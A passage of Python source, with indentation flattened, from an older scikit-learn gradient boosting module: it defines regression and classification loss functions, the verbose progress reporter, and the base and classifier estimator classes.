gamma = _weighted_percentile(np.abs(diff), sample_weight, self.alpha * 100)
gamma_mask = np.abs(diff) <= gamma
if sample_weight is None:
sq_loss = np.sum(0.5 * diff[gamma_mask] ** 2.0)
lin_loss = np.sum(gamma * (np.abs(diff[~gamma_mask]) - gamma / 2.0))
loss = (sq_loss + lin_loss) / y.shape[0]
else:
sq_loss = np.sum(0.5 * sample_weight[gamma_mask] * diff[gamma_mask] ** 2.0)
lin_loss = np.sum(gamma * sample_weight[~gamma_mask] *
(np.abs(diff[~gamma_mask]) - gamma / 2.0))
loss = (sq_loss + lin_loss) / sample_weight.sum()
return loss
def negative_gradient(self, y, pred, sample_weight=None, **kargs):
pred = pred.ravel()
diff = y - pred
if sample_weight is None:
gamma = stats.scoreatpercentile(np.abs(diff), self.alpha * 100)
else:
gamma = _weighted_percentile(np.abs(diff), sample_weight, self.alpha * 100)
gamma_mask = np.abs(diff) <= gamma
residual = np.zeros((y.shape[0],), dtype=np.float64)
residual[gamma_mask] = diff[gamma_mask]
residual[~gamma_mask] = gamma * np.sign(diff[~gamma_mask])
self.gamma = gamma
return residual
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
terminal_region = np.where(terminal_regions == leaf)[0]
sample_weight = sample_weight.take(terminal_region, axis=0)
gamma = self.gamma
diff = (y.take(terminal_region, axis=0)
- pred.take(terminal_region, axis=0))
median = _weighted_percentile(diff, sample_weight, percentile=50)
diff_minus_median = diff - median
tree.value[leaf, 0] = median + np.mean(
np.sign(diff_minus_median) *
np.minimum(np.abs(diff_minus_median), gamma))
class QuantileLossFunction(RegressionLossFunction):
"""Loss function for quantile regression.
Quantile regression allows to estimate the percentiles
of the conditional distribution of the target.
"""
def __init__(self, n_classes, alpha=0.9):
super(QuantileLossFunction, self).__init__(n_classes)
assert 0 < alpha < 1.0
self.alpha = alpha
self.percentile = alpha * 100.0
def init_estimator(self):
return QuantileEstimator(self.alpha)
def __call__(self, y, pred, sample_weight=None):
pred = pred.ravel()
diff = y - pred
alpha = self.alpha
mask = y > pred
if sample_weight is None:
loss = (alpha * diff[mask].sum() +
(1.0 - alpha) * diff[~mask].sum()) / y.shape[0]
else:
loss = ((alpha * np.sum(sample_weight[mask] * diff[mask]) +
(1.0 - alpha) * np.sum(sample_weight[~mask] * diff[~mask])) /
sample_weight.sum())
return loss
def negative_gradient(self, y, pred, **kargs):
alpha = self.alpha
pred = pred.ravel()
mask = y > pred
return (alpha * mask) - ((1.0 - alpha) * ~mask)
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
terminal_region = np.where(terminal_regions == leaf)[0]
diff = (y.take(terminal_region, axis=0)
- pred.take(terminal_region, axis=0))
sample_weight = sample_weight.take(terminal_region, axis=0)
val = _weighted_percentile(diff, sample_weight, self.percentile)
tree.value[leaf, 0] = val
class ClassificationLossFunction(six.with_metaclass(ABCMeta, LossFunction)):
"""Base class for classification loss functions. """
def _score_to_proba(self, score):
"""Template method to convert scores to probabilities.
the does not support probabilites raises AttributeError.
"""
raise TypeError('%s does not support predict_proba' % type(self).__name__)
@abstractmethod
def _score_to_decision(self, score):
"""Template method to convert scores to decisions.
Returns int arrays.
"""
class BinomialDeviance(ClassificationLossFunction):
"""Binomial deviance loss function for binary classification.
Binary classification is a special case; here, we only need to
fit one tree instead of ``n_classes`` trees.
"""
def __init__(self, n_classes):
if n_classes != 2:
raise ValueError("{0:s} requires 2 classes.".format(
self.__class__.__name__))
# we only need to fit one tree for binary clf.
super(BinomialDeviance, self).__init__(1)
def init_estimator(self):
return LogOddsEstimator()
def __call__(self, y, pred, sample_weight=None):
"""Compute the deviance (= 2 * negative log-likelihood). """
# logaddexp(0, v) == log(1.0 + exp(v))
pred = pred.ravel()
if sample_weight is None:
return -2.0 * np.mean((y * pred) - np.logaddexp(0.0, pred))
else:
return (-2.0 / sample_weight.sum() *
np.sum(sample_weight * ((y * pred) - np.logaddexp(0.0, pred))))
def negative_gradient(self, y, pred, **kargs):
"""Compute the residual (= negative gradient). """
return y - expit(pred.ravel())
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
"""Make a single Newton-Raphson step.
our node estimate is given by:
sum(w * (y - prob)) / sum(w * prob * (1 - prob))
we take advantage that: y - prob = residual
"""
terminal_region = np.where(terminal_regions == leaf)[0]
residual = residual.take(terminal_region, axis=0)
y = y.take(terminal_region, axis=0)
sample_weight = sample_weight.take(terminal_region, axis=0)
numerator = np.sum(sample_weight * residual)
denominator = np.sum(sample_weight * (y - residual) * (1 - y + residual))
if denominator == 0.0:
tree.value[leaf, 0, 0] = 0.0
else:
tree.value[leaf, 0, 0] = numerator / denominator
def _score_to_proba(self, score):
proba = np.ones((score.shape[0], 2), dtype=np.float64)
proba[:, 1] = 1.0 / (1.0 + np.exp(-score.ravel()))
proba[:, 0] -= proba[:, 1]
return proba
def _score_to_decision(self, score):
proba = self._score_to_proba(score)
return np.argmax(proba, axis=1)
class MultinomialDeviance(ClassificationLossFunction):
"""Multinomial deviance loss function for multi-class classification.
For multi-class classification we need to fit ``n_classes`` trees at
each stage.
"""
is_multi_class = True
def __init__(self, n_classes):
if n_classes < 3:
raise ValueError("{0:s} requires more than 2 classes.".format(
self.__class__.__name__))
super(MultinomialDeviance, self).__init__(n_classes)
def init_estimator(self):
return PriorProbabilityEstimator()
def __call__(self, y, pred, sample_weight=None):
# create one-hot label encoding
Y = np.zeros((y.shape[0], self.K), dtype=np.float64)
for k in range(self.K):
Y[:, k] = y == k
if sample_weight is None:
return np.sum(-1 * (Y * pred).sum(axis=1) +
logsumexp(pred, axis=1))
else:
return np.sum(-1 * sample_weight * (Y * pred).sum(axis=1) +
logsumexp(pred, axis=1))
def negative_gradient(self, y, pred, k=0, **kwargs):
"""Compute negative gradient for the ``k``-th class. """
return y - np.nan_to_num(np.exp(pred[:, k] -
logsumexp(pred, axis=1)))
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
"""Make a single Newton-Raphson step. """
terminal_region = np.where(terminal_regions == leaf)[0]
residual = residual.take(terminal_region, axis=0)
y = y.take(terminal_region, axis=0)
sample_weight = sample_weight.take(terminal_region, axis=0)
numerator = np.sum(sample_weight * residual)
numerator *= (self.K - 1) / self.K
denominator = np.sum(sample_weight * (y - residual) *
(1.0 - y + residual))
if denominator == 0.0:
tree.value[leaf, 0, 0] = 0.0
else:
tree.value[leaf, 0, 0] = numerator / denominator
def _score_to_proba(self, score):
return np.nan_to_num(
np.exp(score - (logsumexp(score, axis=1)[:, np.newaxis])))
def _score_to_decision(self, score):
proba = self._score_to_proba(score)
return np.argmax(proba, axis=1)
class ExponentialLoss(ClassificationLossFunction):
"""Exponential loss function for binary classification.
Same loss as AdaBoost.
References
----------
Greg Ridgeway, Generalized Boosted Models: A guide to the gbm package, 2007
"""
def __init__(self, n_classes):
if n_classes != 2:
raise ValueError("{0:s} requires 2 classes.".format(
self.__class__.__name__))
# we only need to fit one tree for binary clf.
super(ExponentialLoss, self).__init__(1)
def init_estimator(self):
return ScaledLogOddsEstimator()
def __call__(self, y, pred, sample_weight=None):
pred = pred.ravel()
if sample_weight is None:
return np.mean(np.exp(-(2. * y - 1.) * pred))
else:
return (1.0 / sample_weight.sum() *
np.sum(sample_weight * np.exp(-(2 * y - 1) * pred)))
def negative_gradient(self, y, pred, **kargs):
y_ = -(2. * y - 1.)
return y_ * np.exp(y_ * pred.ravel())
def _update_terminal_region(self, tree, terminal_regions, leaf, X, y,
residual, pred, sample_weight):
terminal_region = np.where(terminal_regions == leaf)[0]
pred = pred.take(terminal_region, axis=0)
y = y.take(terminal_region, axis=0)
sample_weight = sample_weight.take(terminal_region, axis=0)
y_ = 2. * y - 1.
numerator = np.sum(y_ * sample_weight * np.exp(-y_ * pred))
denominator = np.sum(sample_weight * np.exp(-y_ * pred))
if denominator == 0.0:
tree.value[leaf, 0, 0] = 0.0
else:
tree.value[leaf, 0, 0] = numerator / denominator
def _score_to_proba(self, score):
proba = np.ones((score.shape[0], 2), dtype=np.float64)
proba[:, 1] = 1.0 / (1.0 + np.exp(-2.0 * score.ravel()))
proba[:, 0] -= proba[:, 1]
return proba
def _score_to_decision(self, score):
return (score.ravel() >= 0.0).astype(np.int)
LOSS_FUNCTIONS = {'ls': LeastSquaresError,
'lad': LeastAbsoluteError,
'huber': HuberLossFunction,
'quantile': QuantileLossFunction,
'deviance': None, # for both, multinomial and binomial
'exponential': ExponentialLoss,
}
INIT_ESTIMATORS = {'zero': ZeroEstimator}
class VerboseReporter(object):
"""Reports verbose output to stdout.
If ``verbose==1`` output is printed once in a while (when iteration mod
verbose_mod is zero).; if larger than 1 then output is printed for
each update.
"""
def __init__(self, verbose):
self.verbose = verbose
def init(self, est, begin_at_stage=0):
# header fields and line format str
header_fields = ['Iter', 'Train Loss']
verbose_fmt = ['{iter:>10d}', '{train_score:>16.4f}']
# do oob?
if est.subsample < 1:
header_fields.append('OOB Improve')
verbose_fmt.append('{oob_impr:>16.4f}')
header_fields.append('Remaining Time')
verbose_fmt.append('{remaining_time:>16s}')
# print the header line
print(('%10s ' + '%16s ' *
(len(header_fields) - 1)) % tuple(header_fields))
self.verbose_fmt = ' '.join(verbose_fmt)
# plot verbose info each time i % verbose_mod == 0
self.verbose_mod = 1
self.start_time = time()
self.begin_at_stage = begin_at_stage
def update(self, j, est):
"""Update reporter with new iteration. """
do_oob = est.subsample < 1
# we need to take into account if we fit additional estimators.
i = j - self.begin_at_stage # iteration relative to the start iter
if (i + 1) % self.verbose_mod == 0:
oob_impr = est.oob_improvement_[j] if do_oob else 0
remaining_time = ((est.n_estimators - (j + 1)) *
(time() - self.start_time) / float(i + 1))
if remaining_time > 60:
remaining_time = '{0:.2f}m'.format(remaining_time / 60.0)
else:
remaining_time = '{0:.2f}s'.format(remaining_time)
print(self.verbose_fmt.format(iter=j + 1,
train_score=est.train_score_[j],
oob_impr=oob_impr,
remaining_time=remaining_time))
if self.verbose == 1 and ((i + 1) // (self.verbose_mod * 10) > 0):
# adjust verbose frequency (powers of 10)
self.verbose_mod *= 10
class BaseGradientBoosting(six.with_metaclass(ABCMeta, BaseEnsemble,
_LearntSelectorMixin)):
"""Abstract base class for Gradient Boosting. """
@abstractmethod
def __init__(self, loss, learning_rate, n_estimators, min_samples_split,
min_samples_leaf, min_weight_fraction_leaf,
max_depth, init, subsample, max_features,
random_state, alpha=0.9, verbose=0, max_leaf_nodes=None,
warm_start=False):
self.n_estimators = n_estimators
self.learning_rate = learning_rate
self.loss = loss
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.subsample = subsample
self.max_features = max_features
self.max_depth = max_depth
self.init = init
self.random_state = random_state
self.alpha = alpha
self.verbose = verbose
self.max_leaf_nodes = max_leaf_nodes
self.warm_start = warm_start
self.estimators_ = np.empty((0, 0), dtype=np.object)
def _fit_stage(self, i, X, y, y_pred, sample_weight, sample_mask,
criterion, splitter, random_state):
"""Fit another stage of ``n_classes_`` trees to the boosting model. """
assert sample_mask.dtype == np.bool
loss = self.loss_
original_y = y
for k in range(loss.K):
if loss.is_multi_class:
y = np.array(original_y == k, dtype=np.float64)
residual = loss.negative_gradient(y, y_pred, k=k,
sample_weight=sample_weight)
# induce regression tree on residuals
tree = DecisionTreeRegressor(
criterion=criterion,
splitter=splitter,
max_depth=self.max_depth,
min_samples_split=self.min_samples_split,
min_samples_leaf=self.min_samples_leaf,
min_weight_fraction_leaf=self.min_weight_fraction_leaf,
max_features=self.max_features,
max_leaf_nodes=self.max_leaf_nodes,
random_state=random_state)
if self.subsample < 1.0:
# no inplace multiplication!
sample_weight = sample_weight * sample_mask.astype(np.float64)
tree.fit(X, residual, sample_weight=sample_weight,
check_input=False)
# update tree leaves
loss.update_terminal_regions(tree.tree_, X, y, residual, y_pred,
sample_weight, sample_mask,
self.learning_rate, k=k)
# add tree to ensemble
self.estimators_[i, k] = tree
return y_pred
def _check_params(self):
"""Check validity of parameters and raise ValueError if not valid. """
if self.n_estimators <= 0:
raise ValueError("n_estimators must be greater than 0 but "
"was %r" % self.n_estimators)
if self.learning_rate <= 0.0:
raise ValueError("learning_rate must be greater than 0 but "
"was %r" % self.learning_rate)
if (self.loss not in self._SUPPORTED_LOSS
or self.loss not in LOSS_FUNCTIONS):
raise ValueError("Loss '{0:s}' not supported. ".format(self.loss))
if self.loss == 'deviance':
loss_class = (MultinomialDeviance
if len(self.classes_) > 2
else BinomialDeviance)
else:
loss_class = LOSS_FUNCTIONS[self.loss]
if self.loss in ('huber', 'quantile'):
self.loss_ = loss_class(self.n_classes_, self.alpha)
else:
self.loss_ = loss_class(self.n_classes_)
if not (0.0 < self.subsample <= 1.0):
raise ValueError("subsample must be in (0,1] but "
"was %r" % self.subsample)
if self.init is not None:
if isinstance(self.init, six.string_types):
if self.init not in INIT_ESTIMATORS:
raise ValueError('init="%s" is not supported' % self.init)
else:
if (not hasattr(self.init, 'fit')
or not hasattr(self.init, 'predict')):
raise ValueError("init=%r must be valid BaseEstimator "
"and support both fit and "
"predict" % self.init)
if not (0.0 < self.alpha < 1.0):
raise ValueError("alpha must be in (0.0, 1.0) but "
"was %r" % self.alpha)
if isinstance(self.max_features, six.string_types):
if self.max_features == "auto":
# if is_classification
if self.n_classes_ > 1:
max_features = max(1, int(np.sqrt(self.n_features)))
else:
# is regression
max_features = self.n_features
elif self.max_features == "sqrt":
max_features = max(1, int(np.sqrt(self.n_features)))
elif self.max_features == "log2":
max_features = max(1, int(np.log2(self.n_features)))
else:
raise ValueError("Invalid value for max_features: %r. "
"Allowed string values are 'auto', 'sqrt' "
"or 'log2'." % self.max_features)
elif self.max_features is None:
max_features = self.n_features
elif isinstance(self.max_features, (numbers.Integral, np.integer)):
max_features = self.max_features
else: # float
if 0. < self.max_features <= 1.:
max_features = max(int(self.max_features * self.n_features), 1)
else:
raise ValueError("max_features must be in (0, n_features]")
self.max_features_ = max_features
def _init_state(self):
"""Initialize model state and allocate model state data structures. """
if self.init is None:
self.init_ = self.loss_.init_estimator()
elif isinstance(self.init, six.string_types):
self.init_ = INIT_ESTIMATORS[self.init]()
else:
self.init_ = self.init
self.estimators_ = np.empty((self.n_estimators, self.loss_.K),
dtype=np.object)
self.train_score_ = np.zeros((self.n_estimators,), dtype=np.float64)
# do oob?
if self.subsample < 1.0:
self.oob_improvement_ = np.zeros((self.n_estimators),
dtype=np.float64)
def _clear_state(self):
"""Clear the state of the gradient boosting model. """
if hasattr(self, 'estimators_'):
self.estimators_ = np.empty((0, 0), dtype=np.object)
if hasattr(self, 'train_score_'):
del self.train_score_
if hasattr(self, 'oob_improvement_'):
del self.oob_improvement_
if hasattr(self, 'init_'):
del self.init_
def _resize_state(self):
"""Add additional ``n_estimators`` entries to all attributes. """
# self.n_estimators is the number of additional est to fit
total_n_estimators = self.n_estimators
if total_n_estimators < self.estimators_.shape[0]:
raise ValueError('resize with smaller n_estimators %d < %d' %
(total_n_estimators, self.estimators_[0]))
self.estimators_.resize((total_n_estimators, self.loss_.K))
self.train_score_.resize(total_n_estimators)
if (self.subsample < 1 or hasattr(self, 'oob_improvement_')):
# if do oob resize arrays or create new if not available
if hasattr(self, 'oob_improvement_'):
self.oob_improvement_.resize(total_n_estimators)
else:
self.oob_improvement_ = np.zeros((total_n_estimators,),
dtype=np.float64)
def _is_initialized(self):
return len(getattr(self, 'estimators_', [])) > 0
def fit(self, X, y, sample_weight=None, monitor=None):
"""Fit the gradient boosting model.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples]
Target values (integers in classification, real numbers in
regression)
For classification, labels must correspond to classes.
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
monitor : callable, optional
The monitor is called after each iteration with the current
iteration, a reference to the estimator and the local variables of
``_fit_stages`` as keyword arguments ``callable(i, self,
locals())``. If the callable returns ``True`` the fitting procedure
is stopped. The monitor can be used for various things such as
computing held-out estimates, early stopping, model introspect, and
snapshoting.
Returns
-------
self : object
Returns self.
"""
# if not warmstart - clear the estimator state
if not self.warm_start:
self._clear_state()
# Check input
X, y = check_X_y(X, y, dtype=DTYPE)
n_samples, self.n_features = X.shape
if sample_weight is None:
sample_weight = np.ones(n_samples, dtype=np.float32)
else:
sample_weight = column_or_1d(sample_weight, warn=True)
check_consistent_length(X, y, sample_weight)
y = self._validate_y(y)
random_state = check_random_state(self.random_state)
self._check_params()
if not self._is_initialized():
# init state
self._init_state()
# fit initial model - FIXME make sample_weight optional
self.init_.fit(X, y, sample_weight)
# init predictions
y_pred = self.init_.predict(X)
begin_at_stage = 0
else:
# add more estimators to fitted model
# invariant: warm_start = True
if self.n_estimators < self.estimators_.shape[0]:
raise ValueError('n_estimators=%d must be larger or equal to '
'estimators_.shape[0]=%d when '
'warm_start==True'
% (self.n_estimators,
self.estimators_.shape[0]))
begin_at_stage = self.estimators_.shape[0]
y_pred = self._decision_function(X)
self._resize_state()
# fit the boosting stages
n_stages = self._fit_stages(X, y, y_pred, sample_weight, random_state,
begin_at_stage, monitor)
# change shape of arrays after fit (early-stopping or additional ests)
if n_stages != self.estimators_.shape[0]:
self.estimators_ = self.estimators_[:n_stages]
self.train_score_ = self.train_score_[:n_stages]
if hasattr(self, 'oob_improvement_'):
self.oob_improvement_ = self.oob_improvement_[:n_stages]
return self
def _fit_stages(self, X, y, y_pred, sample_weight, random_state,
begin_at_stage=0, monitor=None):
"""Iteratively fits the stages.
For each stage it computes the progress (OOB, train score)
and delegates to ``_fit_stage``.
Returns the number of stages fit; might differ from ``n_estimators``
due to early stopping.
"""
n_samples = X.shape[0]
do_oob = self.subsample < 1.0
sample_mask = np.ones((n_samples, ), dtype=np.bool)
n_inbag = max(1, int(self.subsample * n_samples))
loss_ = self.loss_
# Set min_weight_leaf from min_weight_fraction_leaf
if self.min_weight_fraction_leaf != 0. and sample_weight is not None:
min_weight_leaf = (self.min_weight_fraction_leaf *
np.sum(sample_weight))
else:
min_weight_leaf = 0.
# init criterion and splitter
criterion = FriedmanMSE(1)
splitter = PresortBestSplitter(criterion,
self.max_features_,
self.min_samples_leaf,
min_weight_leaf,
random_state)
if self.verbose:
verbose_reporter = VerboseReporter(self.verbose)
verbose_reporter.init(self, begin_at_stage)
# perform boosting iterations
i = begin_at_stage
for i in range(begin_at_stage, self.n_estimators):
# subsampling
if do_oob:
sample_mask = _random_sample_mask(n_samples, n_inbag,
random_state)
# OOB score before adding this stage
old_oob_score = loss_(y[~sample_mask],
y_pred[~sample_mask],
sample_weight[~sample_mask])
# fit next stage of trees
y_pred = self._fit_stage(i, X, y, y_pred, sample_weight,
sample_mask, criterion, splitter,
random_state)
# track deviance (= loss)
if do_oob:
self.train_score_[i] = loss_(y[sample_mask],
y_pred[sample_mask],
sample_weight[sample_mask])
self.oob_improvement_[i] = (
old_oob_score - loss_(y[~sample_mask],
y_pred[~sample_mask],
sample_weight[~sample_mask]))
else:
# no need to fancy index w/ no subsampling
self.train_score_[i] = loss_(y, y_pred, sample_weight)
if self.verbose > 0:
verbose_reporter.update(i, self)
if monitor is not None:
early_stopping = monitor(i, self, locals())
if early_stopping:
break
return i + 1
def _make_estimator(self, append=True):
# we don't need _make_estimator
raise NotImplementedError()
def _init_decision_function(self, X):
"""Check input and compute prediction of ``init``. """
if self.estimators_ is None or len(self.estimators_) == 0:
raise NotFittedError("Estimator not fitted, call `fit`"
" before making predictions`.")
if X.shape[1] != self.n_features:
raise ValueError("X.shape[1] should be {0:d}, not {1:d}.".format(
self.n_features, X.shape[1]))
score = self.init_.predict(X).astype(np.float64)
return score
def _decision_function(self, X):
# for use in inner loop, not raveling the output in single-class case,
# not doing input validation.
score = self._init_decision_function(X)
predict_stages(self.estimators_, X, self.learning_rate, score)
return score
@deprecated(" and will be removed in 0.19")
def decision_function(self, X):
"""Compute the decision function of ``X``.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
score : array, shape = [n_samples, n_classes] or [n_samples]
The decision function of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
Regression and binary classification produce an array of shape
[n_samples].
"""
X = check_array(X, dtype=DTYPE, order="C")
score = self._decision_function(X)
if score.shape[1] == 1:
return score.ravel()
return score
def _staged_decision_function(self, X):
"""Compute decision function of ``X`` for each iteration.
This method allows monitoring (i.e. determine error on testing set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
score : generator of array, shape = [n_samples, k]
The decision function of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
Regression and binary classification are special cases with
``k == 1``, otherwise ``k==n_classes``.
"""
X = check_array(X, dtype=DTYPE, order="C")
score = self._init_decision_function(X)
for i in range(self.estimators_.shape[0]):
predict_stage(self.estimators_, i, X, self.learning_rate, score)
yield score.copy()
@deprecated(" and will be removed in 0.19")
def staged_decision_function(self, X):
"""Compute decision function of ``X`` for each iteration.
This method allows monitoring (i.e. determine error on testing set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
score : generator of array, shape = [n_samples, k]
The decision function of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
Regression and binary classification are special cases with
``k == 1``, otherwise ``k==n_classes``.
"""
for dec in self._staged_decision_function(X):
# no yield from in Python2.X
yield dec
@property
def feature_importances_(self):
"""Return the feature importances (the higher, the more important the
feature).
Returns
-------
feature_importances_ : array, shape = [n_features]
"""
if self.estimators_ is None or len(self.estimators_) == 0:
raise NotFittedError("Estimator not fitted, call `fit` before"
" `feature_importances_`.")
total_sum = np.zeros((self.n_features, ), dtype=np.float64)
for stage in self.estimators_:
stage_sum = sum(tree.feature_importances_
for tree in stage) / len(stage)
total_sum += stage_sum
importances = total_sum / len(self.estimators_)
return importances
def _validate_y(self, y):
self.n_classes_ = 1
if y.dtype.kind == 'O':
y = y.astype(np.float64)
# Default implementation
return y
class GradientBoostingClassifier(BaseGradientBoosting, ClassifierMixin):
"""Gradient Boosting for classification.
GB builds an additive model in a
forward stage-wise fashion; it allows for the optimization of
arbitrary differentiable loss functions. In each stage ``n_classes_``
regression trees are fit on the negative gradient of the
binomial or multinomial deviance loss function. Binary classification
is a special case where only a single regression tree is induced.
Parameters
----------
loss : {'deviance', 'exponential'}, optional (default='deviance')
loss function to be optimized. 'deviance' refers to
deviance (= logistic regression) for classification
with probabilistic outputs. For loss 'exponential' gradient
boosting recovers the AdaBoost algorithm.
learning_rate : float, optional (default=0.1)
learning rate shrinks the contribution of each tree by `learning_rate`.
There is a trade-off between learning_rate and n_estimators.
n_estimators : int (default=100)
The number of boosting stages to perform. Gradient boosting
is fairly robust to over-fitting so a large number usually
results in better performance.
max_depth : integer, optional (default=3)
maximum depth of the individual regression estimators. The maximum
depth limits the number of nodes in the tree. Tune this parameter
for best performance; the best value depends on the interaction
of the input variables.
Ignored if ``max_leaf_nodes`` is not None.
min_samples_split : integer, optional (default=2)
The minimum number of samples required to split an internal node.
min_samples_leaf : integer, optional (default=1)
The minimum number of samples required to be at a leaf node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
subsample : float, optional (default=1.0)
The fraction of samples to be used for fitting the individual base
learners. If smaller than 1.0 this results in Stochastic Gradient
Boosting. `subsample` interacts with the parameter `n_estimators`.
Choosing `subsample < 1.0` leads to a reduction of variance
and an increase in bias.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Choosing `max_features < n_features` leads to a reduction of variance
and an increase in bias.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
init : BaseEstimator, None, optional (default=None)
An estimator object that is used to compute the initial
predictions. ``init`` has to provide ``fit`` and ``predict``.
If None it uses ``loss.init_estimator``.
verbose : int, default: 0
Enable verbose output. If 1 then it prints progress and performance
once in a while (the more trees the lower the frequency). If greater
than 1 then it prints progress and performance for every tree.
warm_start : bool, default: False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just erase the
previous solution.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
feature_importances_ : array, shape = [n_features]
The feature importances (the higher, the more important the feature).
oob_improvement_ : array, shape = [n_estimators]
The improvement in loss (= deviance) on the out-of-bag samples
relative to the previous iteration.
``oob_improvement_[0]`` is the improvement in
loss of the first stage over the ``init`` estimator.
train_score_ : array, shape = [n_estimators]
The i-th score ``train_score_[i]`` is the deviance (= loss) of the
model at iteration ``i`` on the in-bag sample.
If ``subsample == 1`` this is the deviance on the training data.
loss_ : LossFunction
The concrete ``LossFunction`` object.
init : BaseEstimator
The estimator that provides the initial predictions.
Set via the ``init`` argument or ``loss.init_estimator``.
estimators_ : ndarray of DecisionTreeRegressor, shape = [n_estimators, loss_.K]
The collection of fitted sub-estimators. ``loss_.K`` is 1 for binary
classification, otherwise n_classes.
See also
--------
sklearn.tree.DecisionTreeClassifier, RandomForestClassifier
AdaBoostClassifier
References
----------
J. Friedman, Greedy Function Approximation: A Gradient Boosting
Machine, The Annals of Statistics, Vol. 29, No. 5, 2001.
J. Friedman, Stochastic Gradient Boosting, 1999
T. Hastie, R. Tibshirani and J. Friedman.
Elements of Statistical Learning Ed. 2, Springer, 2009.
"""
_SUPPORTED_LOSS = ('deviance', 'exponential')
def __init__(self, loss='deviance', learning_rate=0.1, n_estimators=100,
subsample=1.0, min_samples_split=2,
min_samples_leaf=1, min_weight_fraction_leaf=0.,
max_depth=3, init=None, random_state=None,
max_features=None, verbose=0,
max_leaf_nodes=None, warm_start=False):
super(GradientBoostingClassifier, self).__init__(
loss=loss, learning_rate=learning_rate, n_estimators=n_estimators,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_depth=max_depth, init=init, subsample=subsample,
max_features=max_features,
random_state=random_state, verbose=verbose,
max_leaf_nodes=max_leaf_nodes, warm_start=warm_start)
def _validate_y(self, y):
self.classes_, y = np.unique(y, return_inverse=True)
self.n_classes_ = len(self.classes_)
return y
def decision_function(self, X):
"""Compute the decision function of ``X``.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
score : array, shape = [n_samples, n_classes] or [n_samples]
The decision function of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
Regression and binary classification produce an array of shape
[n_samples].
"""
X = check_array(X, dtype=DTYPE, order="C")
score = self._decision_function(X)
if score.shape[1] == 1:
return score.ravel()
return score
def staged_decision_function(self, X):
"""Compute decision function of ``X`` for each iteration.
This method allows monitoring (i.e. determine error on testing set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
score : generator of array, shape = [n_samples, k]
The decision function of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
Regression and binary classification are special cases with
``k == 1``, otherwise ``k==n_classes``.
"""
for dec in self._staged_decision_function(X):
# no yield from in Python2.X
yield dec
def predict(self, X):
"""Predict class for X.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y: array of shape = ["n_samples]
The predicted values.
"""
score = self.decision_function(X)
decisions = self.loss_._score_to_decision(score)
return self.classes_.take(decisions, axis=0)
def staged_predict(self, X):
"""Predict class at each stage for X.
This method allows monitoring (i.e. determine error on testing set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : generator of array of shape = [n_samples]
The predicted value of the input samples.
"""
for score in self._staged_decision_function(X):
decisions = self.loss_._score_to_decision(score)
yield self.classes_.take(decisions, axis=0)
def predict_proba(self, X):
"""Predict class probabilities for X.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Raises
------
AttributeError
If the ``loss`` does not support probabilities.
Returns
-------
p : array of shape = [n_samples]
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
score = self.decision_function(X)
try:
return self.loss_._score_to_proba(score)
except NotFittedError:
raise
except AttributeError:
raise AttributeError('loss=%r does not support predict_proba' %
self.loss)
def predict_log_proba(self, X):
"""Predict class log-probabilities for X.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Raises
------
AttributeError
If the ``loss`` does not support probabilities.
Returns
-------
p : array of shape = [n_samples]
The class log-probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
proba = self.predict_proba(X)
return np.log(proba)
def staged_predict_proba(self, X):
"""Predict class probabilities at each stage for X.
This method allows monitoring (i.e. determine error on testing set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : generator of array of shape = [n_samples]
The predicted value of the input samples.
"""
try:
for score in self._staged_decision_function(X):
yield self.loss_._score_to_proba(score)
except NotFittedError:
raise
except AttributeError:
